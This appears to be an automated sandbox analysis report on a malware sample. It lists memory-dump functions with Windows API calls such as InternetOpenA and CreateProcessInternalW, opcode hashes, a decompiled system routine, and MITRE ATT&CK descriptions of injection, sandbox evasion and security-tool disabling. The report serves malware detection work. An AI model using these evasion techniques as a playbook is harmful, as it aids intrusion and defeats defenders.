Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 4edb693a9a9b069020b848ab19b1decac9832ecc2c945175bae967481e2b632f
Instruction ID: 3bac5969a1672e706fcbb4d0c3a0d0440c85398053e9752684f4e3561d09d58f
Opcode Fuzzy Hash: 4edb693a9a9b069020b848ab19b1decac9832ecc2c945175bae967481e2b632f
Instruction Fuzzy Hash: 230129B2905159AFCB04DF88D940EEF7BB9BF88310F058188BA08A7240C630EA11CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 031087E0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 03108837

Strings

rnet, xrefs: 03108801
Open, xrefs: 03108808
rnetOpenA, xrefs: 03108831, 03108836
A, xrefs: 0310880F
InternetOpenA, xrefs: 0310882D, 03108835
Inte, xrefs: 031087FA

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction ID: 9ee72b49e03b1341606d47fab6aaf23a3cc6d67d06155cd9e94d493156cf6cec
Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction Fuzzy Hash: 05F019B2905218AF8B14DF98DC419EBB7B8FF48310B048589BE1897341D770AE20CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 031087D8, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 38networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 03108837

Strings

rnet, xrefs: 03108801
Open, xrefs: 03108808
rnetOpenA, xrefs: 03108831, 03108836
A, xrefs: 0310880F
InternetOpenA, xrefs: 0310882D, 03108835
Inte, xrefs: 031087FA

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: c55761efd9cfbbc8d3c811cf937efdd2b88a651eb00519127bd6bb4dcf3815eb
Instruction ID: 8bd80925e217771a621a84016a19de4b0ac217d21d97a024dbd6e92e64113dce
Opcode Fuzzy Hash: c55761efd9cfbbc8d3c811cf937efdd2b88a651eb00519127bd6bb4dcf3815eb
Instruction Fuzzy Hash: 480169B2910128AF8B10DF98D8419EBBBB9FF48340B048589BE089B341D330AA50CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03108A30, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 34networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 03108A7F

Strings

Inte, xrefs: 03108A4A
eHan, xrefs: 03108A5F
rnet, xrefs: 03108A51
CloseHandle, xrefs: 03108A7B, 03108A7E
Clos, xrefs: 03108A58
dle, xrefs: 03108A66

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleInternet
String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
API String ID: 1081599783-4067651292
Opcode ID: 5dbf4104c698586ebdf7b707d1bf2520d912350f86961b26068399d97cf18735
Instruction ID: 0bd0a1dd434467d6a59678dc9f08aaf921027c88dc16fada80a6f4cf41fa7840
Opcode Fuzzy Hash: 5dbf4104c698586ebdf7b707d1bf2520d912350f86961b26068399d97cf18735
Instruction Fuzzy Hash: D1F03072D05218AF8B10EFD9D9459EEBBB8EB44310F148189ED487B241D6709B10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 03106EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03106F88

Strings

net.dll, xrefs: 03106F51, 03106FD7, 03106FAF, 03106FBB, 03106FE3
wininet.dll, xrefs: 03106F3E, 03106F47

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: dcdc39c7c6c693788b8ef11d0ded37d5dd7c33f95ecf2803788eda0e636ba227
Instruction ID: 53076b90931587361b308a8b92eaee068058031e701c08d4663940b3098de4d1
Opcode Fuzzy Hash: dcdc39c7c6c693788b8ef11d0ded37d5dd7c33f95ecf2803788eda0e636ba227
Instruction Fuzzy Hash: 81317EB5602704ABC725DF68C8B0FA7B7B8EF88700F04851DF61A9B281D7B0A555CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03106ED7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03106F88

Strings

net.dll, xrefs: 03106F51, 03106FAF, 03106FBB
wininet.dll, xrefs: 03106F3E, 03106F47

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: d321ea170ec1c110e114df062ad336bb0429d9c0572c6c1d16e85c2ce08e9ddf
Instruction ID: 9847bb4d9b648d011f8a170a7aaed05127693edd3d6e2a5f3e340ac5e576364d
Opcode Fuzzy Hash: d321ea170ec1c110e114df062ad336bb0429d9c0572c6c1d16e85c2ce08e9ddf
Instruction Fuzzy Hash: 2621A0B5A01304ABD715DFA8C8A0FABB7B4EF88700F04816DF6199B281D7B0A455CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 031084D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030F3B93), ref: 031084FD

Strings

.z`, xrefs: 031084EC, 031084F8

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: ae1181610e4fb8b63be1f8e5ce839470c20f462748217e5c29d37578ffabb5f7
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 0DE01AB5200208ABD714DF59CC44EA777ACAF88650F014554F9185B241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 030F7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030F72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030F72DB

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: 59ce82b832961edc049e06eb749b485a71edb5108909b76e78e0812b49f09bf2
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: 6A01DF31A813287BE760E6948C02FFEB66C9B44B50F040119FF04BE5C0E7D4A90687E6

Uniqueness

Uniqueness Score: -1.00%

Function 030F723E, Relevance: 3.0, APIs: 2, Instructions: 44threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030F72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030F72DB

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: cf34d2b4ae6846e75524dcdaa9d18f82e8f2251f00a9b09b16b8b237220d5b90
Instruction ID: ebbc7f3cfcf47cdd1a5ffb2256973c7f1b99c55f2afbfab3fed1902e0b1d244d
Opcode Fuzzy Hash: cf34d2b4ae6846e75524dcdaa9d18f82e8f2251f00a9b09b16b8b237220d5b90
Instruction Fuzzy Hash: 85F02B76A4131437E760E5A06C02FFE735C5B44A51F19016AFF04EE5C1E7D0D90586E2

Uniqueness

Uniqueness Score: -1.00%

Function 030F9B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 030F9B92

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: d0708a0a6f89947f1d706b08d2fd3da34b77eee80a982fedd84fe638d4a0cb4f
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: E5011EB9D0020DABDF10EAA4DD41F9DB7B89F58208F0441A5AA089B281F771E718CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03108621, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,030FCFA2,030FCFA2,?,00000000,?,?), ref: 03108660

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 0b86a9e070467252bef7f716e9b80bf46a5cc01df4b1368a81c27c6f81a7c8b3
Instruction ID: 34538240fe9f86a3e81237308fc437c5b5567d3e3997df3def75968ebb3d1222
Opcode Fuzzy Hash: 0b86a9e070467252bef7f716e9b80bf46a5cc01df4b1368a81c27c6f81a7c8b3
Instruction Fuzzy Hash: 12F03CB5604248AFDB10EF54DC85DA73768EF89210F018555FD189B341DA30E92187F1

Uniqueness

Uniqueness Score: -1.00%

Function 0310853D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03108594

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 37c64459bbcae1e93bfd70facc31f860ade8abfa874f38edcc64981f64324005
Instruction ID: 9e7b74a852f813537ba833eed9d6e715d1a34bd90142842b7e97262eb2cac701
Opcode Fuzzy Hash: 37c64459bbcae1e93bfd70facc31f860ade8abfa874f38edcc64981f64324005
Instruction Fuzzy Hash: 7C01AFB2204108AFCB54DF89DC80EEB37ADAF8C754F158258FA0DD7240D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03108540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03108594

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: d999a0d2b5095bb2b9452788e13e8cfae5a3e278aa194ffac946fa705073f235
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 3E01AFB2214208ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03107010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030FCCD0,?,?), ref: 0310704C

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 095b0b520be20d85b9640018a1fec647bbd965483516bedb257205f626dfced0
Instruction ID: 9a7f4ff44f2e3a361e0454ebccfc271c5d4dd574646faa725bbf77ff92e4202b
Opcode Fuzzy Hash: 095b0b520be20d85b9640018a1fec647bbd965483516bedb257205f626dfced0
Instruction Fuzzy Hash: 19E092373903143BE330A599AC02FA7B39CCB95B20F540126FB0DEB2C0DAE5F80142A8

Uniqueness

Uniqueness Score: -1.00%

Function 03108667, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,030FCFA2,030FCFA2,?,00000000,?,?), ref: 03108660

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: ce2ce1e630100c4784e3803365432feb2e9fde475ad680b7684bad067a01c1cf
Instruction ID: 69a52954fcb60b2362d0dbec4b9ba3a99cf5908580a58b610ed6b2b5f3c3691b
Opcode Fuzzy Hash: ce2ce1e630100c4784e3803365432feb2e9fde475ad680b7684bad067a01c1cf
Instruction Fuzzy Hash: F8F027B11082446FE714EFA0DD88EE7BB68DF85320F240AADECCC1F146C531A415CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 031085D6, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,030FCFA2,030FCFA2,?,00000000,?,?), ref: 03108660

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6792067cfb321756864b91479d65c91e9b5b259717dc613fdfbf793dfc768211
Instruction ID: 79915847b4dd8b703312e4e275fae4bfd086992b5945c5430defcb7d87d8ca92
Opcode Fuzzy Hash: 6792067cfb321756864b91479d65c91e9b5b259717dc613fdfbf793dfc768211
Instruction Fuzzy Hash: 0DE0D8761086546BD710DF15DC80EDB7B99DF86290F298559FC8E1B241C531A815CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 031084C2, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03103516,?,03103C8F,03103C8F,?,03103516,?,?,?,?,?,00000000,00000000,?), ref: 031084BD

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 38b229278f598bdf7ab0e1bbda26c332c06511e7af434dace7d2e01d6f44d228
Instruction ID: 7845ff5f38d7fe1017e6b34363eba2845d4ae04dcdff7399c290058b92a115f3
Opcode Fuzzy Hash: 38b229278f598bdf7ab0e1bbda26c332c06511e7af434dace7d2e01d6f44d228
Instruction Fuzzy Hash: 58E09AB6200200BBE724DF54CC40FE77769AF88210F158548FB186B381CA31E914CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 03108630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,030FCFA2,030FCFA2,?,00000000,?,?), ref: 03108660

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 8df757c756efd9b3a1e217d4c5a37e2104d8e967e98950c692e9e2349c02fd3e
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: E1E01AB5200208ABDB10DF49CC84EE737ADAF88650F018554FA085B241CA30E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 03108490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03103516,?,03103C8F,03103C8F,?,03103516,?,?,?,?,?,00000000,00000000,?), ref: 031084BD

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 0f32eff2e1bdcb820d3cda837c0e8b175451028fc0e29d554d6582e4089cae43
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 4AE046B6200308ABDB14EF99CC40EA777ACEF88650F118558FE185B281CA30F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 030FD40F, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,030F7C63,?), ref: 030FD43B

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2a1271aca54d4e5b7495ad61d63553627f260d51e1fa42dedce0eeb5730034c3
Instruction ID: fc40eefc758f3f0367ee2bb7b1fac4e715d6294d99b9ccecfd842e0adc994f34
Opcode Fuzzy Hash: 2a1271aca54d4e5b7495ad61d63553627f260d51e1fa42dedce0eeb5730034c3
Instruction Fuzzy Hash: 4BD05E75B903043FEB14EBA49C07F6A76D8AB65640F498068F94AEB2C3DA60E0018920

Uniqueness

Uniqueness Score: -1.00%

Function 030FD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,030F7C63,?), ref: 030FD43B

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 54d9270e7cdab531a985233b85f20957c49789881f12fe1e174b4afec2c3528b
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 2FD0A7757503043BE610FBE89C07F2672CC5B54A00F494064FA49DB3C3DA50F4004561

Uniqueness

Uniqueness Score: -1.00%

Function 030FD445, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,030F7C63,?), ref: 030FD43B

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e33a1a55f55a568120e7242ac4a1f3e6607bde70ea7aa6c09fbfc96c34a18987
Instruction ID: ca74d9ebb2b9493ac25377c07a6b2d663dc3472a31815657088d29efe288e338
Opcode Fuzzy Hash: e33a1a55f55a568120e7242ac4a1f3e6607bde70ea7aa6c09fbfc96c34a18987
Instruction Fuzzy Hash: DFC0CC20800A0A0F8280CAE02C808A0E2022B00002B0FC0CAE2080FE8ACAA2A00C2B00

Uniqueness

Uniqueness Score: -1.00%

Function 04E5967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E59694

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02bfcb75c9d4f8d08966d315e44c413580fa0bf8fb10fc9fbeb981882044bc5c
Instruction ID: cf7afe04f1e59eb1efdc2294326d98e6c55393a286cc3452dd9d44a941d23a5d
Opcode Fuzzy Hash: 02bfcb75c9d4f8d08966d315e44c413580fa0bf8fb10fc9fbeb981882044bc5c
Instruction Fuzzy Hash: CDB09BB1A414C5C5F711D7614A08B17794477D0745F56D451D1130641B477CD095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04EAFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04EAFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04E5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04EA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04EA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04eafdda
0x04eafde2
0x04eafde5
0x04eafdec
0x04eafdfa
0x04eafdff
0x04eafe0a
0x04eafe0f
0x04eafe17
0x04eafe1e
0x04eafe19
0x04eafe19
0x04eafe19
0x04eafe20
0x04eafe21
0x04eafe22
0x04eafe25
0x04eafe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04EAFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04EAFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04EAFE2B

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 02f41c488561ad6745029fd0e43db615b08437aac2e2245ef3219c237960640f
Instruction ID: ff2280a08d2ec7cd93dbb1770260837a7eb58b0e742089497f2dba526620ed0e
Opcode Fuzzy Hash: 02f41c488561ad6745029fd0e43db615b08437aac2e2245ef3219c237960640f
Instruction Fuzzy Hash: 32F0C232200201BBEA241B45DC06F33BB5AEB44730F245255F6285A1E1EAA2B87097A4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

